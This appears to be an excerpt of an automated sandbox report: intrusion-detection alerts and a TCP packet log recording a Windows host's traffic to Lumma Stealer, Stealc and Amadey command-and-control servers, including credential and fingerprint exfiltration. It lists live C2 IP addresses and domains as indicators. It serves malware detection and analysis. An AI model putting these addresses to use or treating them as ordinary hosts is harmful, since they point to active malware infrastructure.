                                                                                                                                                                                                                                                              2024-12-22T02:19:05.778609+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450276104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:05.988229+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450276104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:08.412953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450284104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:08.699676+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450286104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:08.740055+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.450287104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:08.740055+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450287104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:09.526983+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450287104.21.21.99443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:09.972691+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450288185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:10.971606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450292104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:10.985979+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450291185.215.113.1680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:12.013779+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450295212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:13.258407+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450298104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:13.712201+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450299104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:14.023689+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450298104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:16.361190+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450302185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:17.756437+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450304104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:18.107488+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450306212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:18.795844+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450304104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:23.289904+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450325185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:24.372914+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450339212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:30.427962+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450358212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:30.539459+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450357185.215.113.20680TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:36.491350+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450366212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:42.735546+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450372212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:48.787598+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450386212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:19:54.809650+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450402212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:00.842641+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450406212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:06.879631+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450412212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:12.916411+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450416212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:19.013424+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450428212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:25.065544+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450435212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:31.444346+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450447212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:37.472580+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450451212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:43.538037+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450455212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:49.577276+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450460212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:20:55.616587+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450472212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:01.671951+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450476212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:07.721338+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450489212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:13.780895+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450496212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:16.862732+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.450498212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:19.849771+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450500212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:19.958374+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450497TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:21.319108+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450501185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:25.987851+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450504212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:31.440183+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450505TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:32.143982+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450508212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:32.795375+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450509185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:33.495571+01002058397ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)1192.168.2.4566391.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:21:34.966397+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450517172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:34.966397+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450517172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:35.728718+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450517172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:35.728718+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450517172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:36.960526+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450520172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:36.960526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450520172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:37.739791+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450520172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:37.739791+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450520172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:38.319056+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450521212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:39.594134+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450523172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:39.594134+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450523172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:41.997027+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450526172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:41.997027+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450526172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:42.902536+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450526172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:44.206069+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450527172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:44.206069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450527172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:44.448509+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450528212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:46.956179+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450533172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:46.956179+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450533172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:49.582086+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450541172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:49.582086+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450541172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:50.516015+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450541172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:50.569457+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450542212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:51.742096+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.450544172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:51.742096+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450544172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:52.503723+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450544172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:21:56.661111+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450547212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:02.827085+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450558212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:08.898113+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450562212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:14.962769+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450567212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:19.546142+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450568TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:20.898558+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450571185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:21.049253+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450572212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:27.127593+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450580212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:33.170948+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450584212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:39.360469+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450595212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:45.413451+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450598212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:51.686427+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450604212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:55.690496+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450605TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:57.055457+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450608185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:22:57.752693+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450610212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:01.348439+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450614104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:02.125625+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450614104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:02.125625+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450614104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:03.386494+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450616104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:03.841486+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450617212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:04.162121+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450616104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:04.162121+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450616104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:05.657501+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450618104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:07.823180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450622104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:09.910578+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450623212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:10.352798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450624104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:12.541103+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450633104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:13.308374+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450633104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:14.735602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450636104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:15.693434+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450636104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:15.963476+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450637212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:16.932736+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450639104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:17.711754+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450639104.21.89.115443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:21.997068+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450642212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:28.044776+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450646212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:34.099774+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450650212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:40.143509+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450654212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:46.212321+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450665212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:52.318557+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450669212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:23:58.364622+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450673212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:24:04.447895+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450677212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:24:10.519028+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450681212.193.31.880TCP
                                                                                                                                                                                                                                                              2024-12-22T02:24:16.568999+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.450685212.193.31.880TCP
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:05.881716967 CET4975380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:06.001594067 CET8049753185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:06.006066084 CET4975380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:06.006340981 CET4975380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:06.125813961 CET8049753185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:07.338330030 CET8049753185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:07.338428974 CET4975380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.842034101 CET4975380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.842477083 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.962080002 CET8049759185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.962182999 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.962223053 CET8049753185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.962286949 CET4975380192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:08.962471008 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:09.082061052 CET8049759185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.341069937 CET8049759185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.341134071 CET8049759185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.341151953 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.341191053 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.575788975 CET8049759185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.575920105 CET4975980192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.584830999 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.704441071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.704564095 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.704891920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:10.824410915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042447090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042486906 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042541027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042670965 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042712927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042751074 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042784929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042784929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042814016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.042840004 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043080091 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043117046 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043167114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043167114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043232918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043267965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043299913 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.043381929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.162758112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.162846088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.162863970 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.162926912 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.166798115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.166882038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.233814955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.233963013 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.234010935 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.234075069 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.238048077 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.238106966 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.238138914 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.238190889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.246345997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.246403933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.246499062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.246550083 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.254730940 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.254786968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.254858971 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.254911900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.263103962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.263195992 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.263426065 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.263479948 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.271467924 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.271526098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.271600962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.271657944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.279902935 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.279959917 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.280019045 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.280076981 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.288239002 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.288302898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.288361073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.288412094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.296644926 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.296704054 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.296757936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.296802998 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.305424929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.305480003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.305516958 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.305550098 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.313503981 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.313575983 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.313621044 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.313678026 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.353894949 CET804976531.41.244.11192.168.2.4
